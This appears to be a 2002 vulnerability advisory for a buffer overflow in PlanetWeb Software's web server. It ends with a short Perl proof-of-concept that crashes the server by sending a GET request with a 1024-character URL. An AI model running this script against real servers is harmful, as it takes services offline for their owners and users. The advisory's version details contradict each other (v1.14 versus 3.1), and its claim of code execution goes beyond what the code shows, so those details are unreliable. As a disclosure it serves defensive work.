:UkR security team presents: Release Date: September 14, 2002 Product : PlanetWeb Software v1.14 and earlier versions Vendor : PlanetDNS (http://www.planetdns.net) Type : Buffer Overflow Author : UkR-XblP (cuctema@ok.ru) Platforms : Microsoft Windows Variants About PlanetWeb: PlanetWeb is a complete commercial software package that provides you with everything you need to run your own website directly from your computer. It includes our lightening fast web server with integrated PHP support, so you can create sophisticated web pages without doing any configuration! Overview: A buffer overflow exists in versions 3.1 and previous of PlanetWeb Software. Exploitation of this vulnerability allows remote execution of arbitrary code with daemon privileges. Detailed Description: Sending a GET request containing a URL of approximately 1024 characters or more causes Planet Web Server to crash. Exploitation is possible and proof of concept code has been authored to demonstrate this problem. Result: PDNSC caused an invalid page fault in module KERNEL32.DLL at 0167:bff9db61. Registers: EAX=c00309c4 CS=0167 EIP=bff9db61 EFLGS=00010216 EBX=ffffffff SS=016f ESP=0214fde8 EBP=02150084 ECX=00000000 DS=016f ESI=81770a14 FS=4217 EDX=bff76855 ES=016f EDI=02150120 GS=0000 Bytes at CS:EIP: 53 8b 15 e4 9c fc bf 56 89 4d e4 57 89 4d dc 89 Stack dump: Solution: Disable the Planet Web Server until a patch is made available by the vendor. ----------------- exploit - cut here ----------------- #!/usr/bin/perl # PlanetWeb Software perl exploit # by UkR-XblP / UkR security team use IO::Socket; unless (@ARGV == 1) { die "usage: $0 vulnurable_server ..." } $host = shift(@ARGV); $remote = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => "http(80)", ); unless ($remote) { die "cannot connect to http daemon on $host" } $xblp = "A" x 1024; $exploit = "GET /".$xblp." HTTP/1.0\n\n"; $remote->autoflush(1); print $remote $exploit; close $remote; ----------------- exploit - cut here ----------------- --- Professional hosting for everyone - http://www.host.ru